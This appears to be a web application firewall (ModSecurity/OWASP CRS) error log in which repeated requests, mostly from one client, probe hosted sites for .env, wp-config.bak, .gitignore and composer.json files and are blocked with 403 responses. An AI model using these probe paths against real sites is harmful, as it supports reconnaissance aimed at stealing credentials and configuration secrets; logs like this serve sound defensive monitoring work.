[Mon May 11 11:29:46.807129 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:20846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/render/.env.copy"] [unique_id "agGhipkIEwRJMyDaV55G2gAAAVU"]
[Mon May 11 11:29:48.726433 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:20846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhipkIEwRJMyDaV55G2gAAAVU"]
[Mon May 11 11:29:48.752572 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:20858] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /render/.env.save.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/render/.env.save.test"] [unique_id "agGhjL4KNmD_mZ_vlf8x4QAAAEg"]
[Mon May 11 11:29:48.752782 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:20858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/render/.env.save.test"] [unique_id "agGhjL4KNmD_mZ_vlf8x4QAAAEg"]
[Mon May 11 11:29:49.297703 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.213.245.59:35627] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGhjRjZymfuKpjWXeh04gAAAMw"], referer: https://www.piregwan-genesis.com/
[Mon May 11 11:29:50.356471 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:20858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhjL4KNmD_mZ_vlf8x4QAAAEg"]
[Mon May 11 11:29:50.383312 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:20870] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /render/.env.save.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/render/.env.save.test"] [unique_id "agGhjmS6k_SCYd1AVZqnrwAAAQg"]
[Mon May 11 11:29:50.383525 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:20870] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/render/.env.save.test"] [unique_id "agGhjmS6k_SCYd1AVZqnrwAAAQg"]
[Mon May 11 11:29:51.592952 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:20870] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhjmS6k_SCYd1AVZqnrwAAAQg"]
[Mon May 11 11:29:51.619222 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:20884] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /render/.env.tmp.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/render/.env.tmp.local"] [unique_id "agGhj0Rdw2n9wv6Ai48AmQAAAIw"]
[Mon May 11 11:29:51.619436 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:20884] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/render/.env.tmp.local"] [unique_id "agGhj0Rdw2n9wv6Ai48AmQAAAIw"]
[Mon May 11 11:29:52.778991 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:20884] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhj0Rdw2n9wv6Ai48AmQAAAIw"]
[Mon May 11 11:29:52.806214 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:20886] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /render/.env.tmp.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/render/.env.tmp.local"] [unique_id "agGhkERdw2n9wv6Ai48AmgAAAIA"]
[Mon May 11 11:29:52.806432 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:20886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/render/.env.tmp.local"] [unique_id "agGhkERdw2n9wv6Ai48AmgAAAIA"]
[Mon May 11 11:29:54.075759 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:20886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhkERdw2n9wv6Ai48AmgAAAIA"]
[Mon May 11 11:29:54.101954 2026] [security2:error] [pid 1256241:tid 1256259] [client 185.177.72.9:16234] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env.copy.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/rest/.env.copy.tmp"] [unique_id "agGhkpkIEwRJMyDaV55G4wAAAU0"]
[Mon May 11 11:29:54.102170 2026] [security2:error] [pid 1256241:tid 1256259] [client 185.177.72.9:16234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/rest/.env.copy.tmp"] [unique_id "agGhkpkIEwRJMyDaV55G4wAAAU0"]
[Mon May 11 11:29:55.439651 2026] [security2:error] [pid 1256241:tid 1256259] [client 185.177.72.9:16234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhkpkIEwRJMyDaV55G4wAAAU0"]
[Mon May 11 11:29:55.466139 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:16246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env.copy.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/rest/.env.copy.tmp"] [unique_id "agGhk5kIEwRJMyDaV55G5AAAAUs"]
[Mon May 11 11:29:55.467141 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:16246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/rest/.env.copy.tmp"] [unique_id "agGhk5kIEwRJMyDaV55G5AAAAUs"]
[Mon May 11 11:29:57.450576 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:16246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhk5kIEwRJMyDaV55G5AAAAUs"]
[Mon May 11 11:30:08.163528 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:38242] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /restapi/.gitignore.min"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/restapi/.gitignore.min"] [unique_id "agGhoJkIEwRJMyDaV55G7QAAAVc"]
[Mon May 11 11:30:08.163968 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:38242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/restapi/.gitignore.min"] [unique_id "agGhoJkIEwRJMyDaV55G7QAAAVc"]
[Mon May 11 11:30:09.333103 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:38242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhoJkIEwRJMyDaV55G7QAAAVc"]
[Mon May 11 11:30:09.359656 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:38254] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /restapi/.gitignore.min"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/restapi/.gitignore.min"] [unique_id "agGhoURdw2n9wv6Ai48ApQAAAII"]
[Mon May 11 11:30:09.359907 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:38254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/restapi/.gitignore.min"] [unique_id "agGhoURdw2n9wv6Ai48ApQAAAII"]
[Mon May 11 11:30:10.595982 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:38254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhoURdw2n9wv6Ai48ApQAAAII"]
[Mon May 11 11:30:13.145722 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:45058] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /restapi/wp-config.bak_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/restapi/wp-config.bak_old"] [unique_id "agGhpb4KNmD_mZ_vlf8x8AAAAFM"]
[Mon May 11 11:30:13.145937 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:45058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/restapi/wp-config.bak_old"] [unique_id "agGhpb4KNmD_mZ_vlf8x8AAAAFM"]
[Mon May 11 11:30:15.647622 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:45058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhpb4KNmD_mZ_vlf8x8AAAAFM"]
[Mon May 11 11:30:15.677215 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:45074] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /restapi/wp-config.bak_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/restapi/wp-config.bak_old"] [unique_id "agGhp2S6k_SCYd1AVZqnwAAAAQQ"]
[Mon May 11 11:30:15.678278 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:45074] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/restapi/wp-config.bak_old"] [unique_id "agGhp2S6k_SCYd1AVZqnwAAAAQQ"]
[Mon May 11 11:30:18.028383 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:45074] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhp2S6k_SCYd1AVZqnwAAAAQQ"]
[Mon May 11 11:30:33.601682 2026] [security2:error] [pid 1256241:tid 1256265] [client 185.191.171.15:29444] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /wp-includes/sodium_compat/composer.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/wp-includes/sodium_compat/composer.json"] [unique_id "agGhuZkIEwRJMyDaV55HAwAAAVM"]
[Mon May 11 11:30:33.601921 2026] [security2:error] [pid 1256241:tid 1256265] [client 185.191.171.15:29444] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-includes/sodium_compat/composer.json"] [unique_id "agGhuZkIEwRJMyDaV55HAwAAAVM"]
[Mon May 11 11:30:33.602265 2026] [security2:error] [pid 1256241:tid 1256265] [client 185.191.171.15:29444] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-includes/sodium_compat/composer.json"] [unique_id "agGhuZkIEwRJMyDaV55HAwAAAVM"]
[Mon May 11 11:30:37.840926 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:10128] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /root/wp-config.bak_temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/root/wp-config.bak_temp"] [unique_id "agGhvb4KNmD_mZ_vlf8yBwAAAEk"]
[Mon May 11 11:30:37.841857 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:10128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/root/wp-config.bak_temp"] [unique_id "agGhvb4KNmD_mZ_vlf8yBwAAAEk"]
